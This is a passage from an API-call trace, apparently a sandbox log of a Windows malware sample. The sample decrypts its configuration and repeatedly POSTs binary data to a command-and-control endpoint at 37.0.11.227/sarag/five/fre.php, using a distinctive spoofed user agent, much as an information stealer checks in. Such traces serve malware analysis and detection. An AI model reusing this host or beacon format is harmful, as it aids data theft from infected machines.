phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0177.430] GetProcessHeap () returned 0x690000 [0177.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0177.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.431] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0177.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.432] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.433] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.433] GetProcessHeap () returned 0x690000 [0177.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0177.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.435] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0177.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.437] CryptDestroyKey (hKey=0x69d028) returned 1 [0177.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.438] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0177.438] GetProcessHeap () returned 0x690000 [0177.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.439] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0177.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.440] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0177.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.441] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0177.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.443] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0177.443] GetProcessHeap () returned 0x690000 [0177.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.443] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9d20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0177.443] GetProcessHeap () returned 0x690000 [0177.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0177.443] socket (af=2, type=1, protocol=6) returned 0x2b0 [0177.443] connect (s=0x2b0, name=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0177.473] FreeAddrInfoW (pAddrInfo=0x6a9d20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0177.473] GetProcessHeap () returned 0x690000 [0177.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0177.473] GetProcessHeap () returned 0x690000 [0177.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0177.474] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0177.475] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.476] GetProcessHeap () returned 0x690000 [0177.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0177.476] GetProcessHeap () returned 0x690000 [0177.476] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0177.476] GetProcessHeap () returned 0x690000 [0177.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0177.476] GetProcessHeap () returned 0x690000 [0177.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0177.477] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0177.478] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.478] GetProcessHeap () returned 0x690000 [0177.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0177.478] GetProcessHeap () returned 0x690000 [0177.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0177.657] send (s=0x2b0, buf=0x6abd08*, len=242, flags=0) returned 242 [0177.713] send (s=0x2b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0177.713] GetProcessHeap () returned 0x690000 [0177.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0177.713] recv (in: s=0x2b0, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0177.787] GetProcessHeap () returned 0x690000 [0177.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0177.801] GetProcessHeap () returned 0x690000 [0177.802] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0177.802] GetProcessHeap () returned 0x690000 [0177.802] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0177.802] GetProcessHeap () returned 0x690000 [0177.802] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0177.803] closesocket (s=0x2b0) returned 0 [0177.803] GetProcessHeap () returned 0x690000 [0177.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0177.803] GetProcessHeap () returned 0x690000 [0177.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0177.804] GetProcessHeap () returned 0x690000 [0177.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0177.806] GetProcessHeap () returned 0x690000 [0177.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x920) returned 0x2b0 [0177.828] Sleep (dwMilliseconds=0xea60) [0177.834] GetProcessHeap () returned 0x690000 [0177.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0177.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0177.867] GetProcessHeap () returned 0x690000 [0177.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0177.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.868] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0177.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.869] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.871] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.871] GetProcessHeap () returned 0x690000 [0177.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0177.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.873] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0177.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.874] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0177.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.875] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0177.875] GetProcessHeap () returned 0x690000 [0177.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.876] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.878] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.879] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.880] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.880] GetProcessHeap () returned 0x690000 [0177.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.881] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.881] GetProcessHeap () returned 0x690000 [0177.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0177.891] GetProcessHeap () returned 0x690000 [0177.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0177.892] GetProcessHeap () returned 0x690000 [0177.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0177.893] GetProcessHeap () returned 0x690000 [0177.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0177.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0177.937] GetProcessHeap () returned 0x690000 [0177.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0177.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.938] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0177.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.939] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.940] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.940] GetProcessHeap () returned 0x690000 [0177.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0177.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.948] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0177.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.973] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0177.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.974] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0177.974] GetProcessHeap () returned 0x690000 [0177.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.976] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0177.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.980] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0177.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.984] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0177.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.985] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0177.985] GetProcessHeap () returned 0x690000 [0177.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0177.985] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0177.985] GetProcessHeap () returned 0x690000 [0177.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0177.986] socket (af=2, type=1, protocol=6) returned 0x2b4 [0177.986] connect (s=0x2b4, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0178.018] FreeAddrInfoW (pAddrInfo=0x6a9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0178.018] GetProcessHeap () returned 0x690000 [0178.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0178.018] GetProcessHeap () returned 0x690000 [0178.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0178.020] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.021] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.021] GetProcessHeap () returned 0x690000 [0178.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0178.021] GetProcessHeap () returned 0x690000 [0178.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.022] GetProcessHeap () returned 0x690000 [0178.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0178.022] GetProcessHeap () returned 0x690000 [0178.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0178.023] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.024] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.024] GetProcessHeap () returned 0x690000 [0178.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0178.024] GetProcessHeap () returned 0x690000 [0178.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.025] send (s=0x2b4, buf=0x6abd08*, len=242, flags=0) returned 242 [0178.026] send (s=0x2b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0178.026] GetProcessHeap () returned 0x690000 [0178.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0178.026] recv (in: s=0x2b4, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0178.114] GetProcessHeap () returned 0x690000 [0178.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0178.114] GetProcessHeap () returned 0x690000 [0178.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0178.115] GetProcessHeap () returned 0x690000 [0178.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0178.115] GetProcessHeap () returned 0x690000 [0178.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0178.115] closesocket (s=0x2b4) returned 0 [0178.116] GetProcessHeap () returned 0x690000 [0178.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0178.116] GetProcessHeap () returned 0x690000 [0178.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.116] GetProcessHeap () returned 0x690000 [0178.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0178.117] GetProcessHeap () returned 0x690000 [0178.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0178.117] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4a8) returned 0x2b4 [0178.120] Sleep (dwMilliseconds=0xea60) [0178.122] GetProcessHeap () returned 0x690000 [0178.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0178.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0178.140] GetProcessHeap () returned 0x690000 [0178.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0178.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.141] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0178.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.142] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.144] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.144] GetProcessHeap () returned 0x690000 [0178.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0178.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.146] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0178.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.148] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0178.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.149] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0178.149] GetProcessHeap () returned 0x690000 [0178.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0178.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.150] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.151] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.152] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.154] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.154] GetProcessHeap () returned 0x690000 [0178.154] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0178.154] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.154] GetProcessHeap () returned 0x690000 [0178.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0178.155] GetProcessHeap () returned 0x690000 [0178.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.155] GetProcessHeap () returned 0x690000 [0178.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0178.155] GetProcessHeap () returned 0x690000 [0178.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0178.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.156] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.164] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0178.170] GetProcessHeap () returned 0x690000 [0178.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0178.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.171] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0178.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.172] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.173] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.173] GetProcessHeap () returned 0x690000 [0178.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 